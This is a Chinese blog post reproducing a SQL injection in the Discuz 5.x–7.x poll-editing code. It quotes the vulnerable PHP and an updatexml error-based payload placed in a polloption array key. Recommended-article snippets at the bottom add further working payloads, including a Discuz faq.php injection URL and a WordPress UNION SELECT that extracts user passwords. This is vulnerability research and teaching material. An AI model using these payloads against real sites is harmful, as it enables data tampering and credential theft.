Discuz 5.x/6.x/7.x投票SQL注入复现

最新推荐文章于 2024-10-06 08:55:12 发布
最新推荐文章于 2024-10-06 08:55:12 发布
阅读量145 收藏
点赞数
文章标签: php spark thinkphp mysql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486872
版权

问题代码:

Discuz_6.1.0F_SC_UTF8includeeditpost.inc.php 288行

$pollarray = '';
$pollarray['options'] = $polloption;
if($pollarray['options']) {
    if(count($pollarray['options']) > $maxpolloptions) {
        showmessage('post_poll_option_toomany');
    }
    foreach($pollarray['options'] as $key => $value) {//这里直接解析出来没处理$key
        if(!trim($value)) {
            $db->query("DELETE FROM {$tablepre}polloptions WHERE polloptionid='$key' AND tid='$tid'");//直接带入key值
            unset($pollarray['options'][$key]);
        }
    }

对用户提交的polloption数组直接解析出来带入SQL语句,因为默认只对数组值过滤,而不过滤键,所以会导致一个DELETE注入。

问题复现:

首先需要一个有新建投票帖子的权限的用户,这里本地搭建,就用admin进行测试

1.png

先新建个投票,然后找到帖子,点击“编辑”。
2.png

点击“编辑”,抓取数据包
3.png
4.png

name="polloption[1' or updatexml(1,concat(0x7e,(version())),0) or '1'='1]"
5.png
6.png
KEY0NE
关注
复现一个老漏洞 Discuz!7.2 faq.php 注入漏洞 分析原理
Au
10-18 4174
源码~   http://pan.baidu.com/s/1gfkvJrX poc /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20fr...
http://a.77x.cc/click.php,Linux主机简单判断CC攻击的命令
weixin_28795271的博客
03-22 3923
CC攻击很容易发起,并且几乎不需要成本,导致现在的CC攻击越来越多。大部分搞CC攻击的人,都是用在网上下载的工具,这些工具很少去伪造特征,所以会留下一些痕迹。使用下面的命令,可以分析下是否在被CC攻击。第一条命令:tcpdump-s0 -A -n -i any | grep -o -E '(GET|POST|HEAD) .*'正常的输出结果类似于这样POST /ajax/validator.PH...
discuz my.php注入,Discuz! 7.2 插件/manyou/sources/notice.php sql注入漏洞
weixin_35044481的博客
03-26 162
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。/manyou/sources/notice.phpif($option == 'del') {$appid = intval($_GET['appid']);$db->query("DELETE FROM {$tablepre}...
Discuz 5.x 6.x 7.x 前台SQL注入漏洞
aixuan9365的博客
06-02 444
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-071516.html 漏洞出现在/include/editpost.inc.php。 if($thread['special'] == 1 && ($alloweditpoll || $isorigauthor) && !empty($p...
Discuz!7.2 SQL注入复现实验
Tranquillity
10-23 2210
0x01 实验准备 实验原理: 实验工具: UCenter Discuz 7.2安装包 实验环境: 安装 Discuz 网站的服务器(Windows) 安装 python 环境的攻击机 0x01 实验步骤 一、搭建环境 1. 安装UCenter 通过 http://192.168.88.129/dz7.2/upload/install/index.php 页面安装: 出现错误: 将UCenter文件放置在dz7.2文件夹下,访问http://192.168.88.129/dz7.2/UCente
主流数据库sql注入攻击原理与实践(图)
05-14
主流数据库sql注入攻击原理与实践(图).
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
qq_41048303的博客
12-05 2374
1.漏洞原理 ​ 由于php5.3 x版本里php.ini的设置request_order默认值为GP,导致Discuz 6.x/7.x全局变量防御绕过漏洞。 2.漏洞环境 ​ 执行docker-compose up -d 启动后,访问http://192.168.254.202:8080/install来安装discuz ​ 数据库地址db,数据库名为discuz,数据库账号密码均为root 3.漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCA
discuz 7.2 faq.php sql注入漏洞,Discuz 7.2 /faq.php SQL注入漏洞
weixin_31935793的博客
04-07 4463
Discuz 7.2 /faq.php SQL注入漏洞1.获取数据库版本信息http://www.xxoo.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from ...
Discuz x3.x模板 迪恩 游戏/VR/Game/测评 商业版 GBK.zip
12-03
X3.x是一款广泛使用的开源社区论坛软件,它以其强大的功能、灵活的扩展性和友好的用户体验深受广大站长喜爱。迪恩(Dean)是其中的一款知名模板开发者,其设计的模板在美观度和实用性上都有着出色的表现。本文将...
Discuz 7.x/6.x 代码执行
haha1314的博客
08-10 482
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...
Discuz x3.x模板 迪恩教育课程职业培训3 商业版 GBK.zip
12-03
《迪恩教育课程职业培训3商业版GBK模板在Discuz x3.x平台的应用与解析》 Discuz x3.x是一款广泛应用于社区论坛建设的开源软件,以其强大的功能和灵活的扩展性深受用户喜爱。其中,“迪恩教育课程职业培训3商业版GBK...
Discuz x3.x模板 迪恩 教育培训课程V7 GBK.zip
12-03
《迪恩教育培训课程V7 GBK模板在Discuz x3.x平台的应用与解析》 Discuz! 是一款广泛使用的开源社区论坛系统,其强大的功能和灵活性吸引了众多网站管理员。迪恩教育培训机构推出的“迪恩教育培训课程V7 GBK”模板,...
Discuz x3.x插件 签到点击广告领积分3.0.zip
11-16
Discuz x3.x是一款广受欢迎的社区论坛系统,它以其强大的功能和灵活的扩展性赢得了众多用户的青睐。在这个数字化的时代,社区论坛不仅是用户交流的平台,也是商家推广产品和服务的有效渠道。而“签到点击广告领积分...
记一次SQL注入的漏洞复现
qq_44954947的博客
05-01 914
很多小伙伴不知道漏洞复现怎么写,今天给大家看看我的…大佬勿喷 至于我为什么没有继续下去,大家可以去读一下白帽子行为规范,漏洞复现只需要证明存在该漏洞就行了 ...
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
10-03 1560
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
RCE+[伪协议综合]
2302_81328699的博客
10-03 540
伪协议综合
精品WordPress主题/响应式个人博客主题Kratos
2403_86698467的博客
10-05 699
主题设计简约友好,并且支持响应式,自适应访问,简seo单大方的主页构造,使得博客能在臃肿杂乱的环境中脱颖而出,Kratos内置主题设置,可设置seo关键字及站点描述页面伪静态,自定义的顶部样式(背景图 ),
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
Simon223的博客
10-04 1130
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
PHP如何解析配置文件
最新发布
sheji888的专栏
10-06 748
选择哪种方法取决于你的需求和偏好。INI文件简单且易于手动编辑,而YAML和JSON文件则更适合复杂和层次化的配置结构。PHP数组文件则提供了最大的灵活性,但可能会让配置与代码混淆。无论你选择哪种方法,都要确保配置文件的安全性和可读性,特别是在生产环境中。
wordpress sql注入复现
04-29
WordPress SQL注入漏洞是指攻击者通过构造恶意SQL语句,利用WordPress的SQL查询接口,成功地向WordPress数据库中插入或者篡改数据,甚至可以直接获取管理员权限。以下是一个简单的复现过程: 1. 在WordPress网站的搜索框中输入以下内容: ``` ' UNION SELECT null, user_login, user_pass FROM wp_users-- ``` 2. 点击搜索按钮,可以看到网站返回的SQL语句中已经将当前WordPress网站的用户名和密码列举出来了。 3. 攻击者可以利用这个漏洞,将恶意代码插入到WordPress数据库中,从而获取网站的控制权。 需要注意的是,为了复现这个漏洞,需要对WordPress进行一定的设置和环境搭建。在实际攻击中,攻击者可能会通过其他途径进行攻击。建议管理员及时更新WordPress版本并采取安全措施来防范此类漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值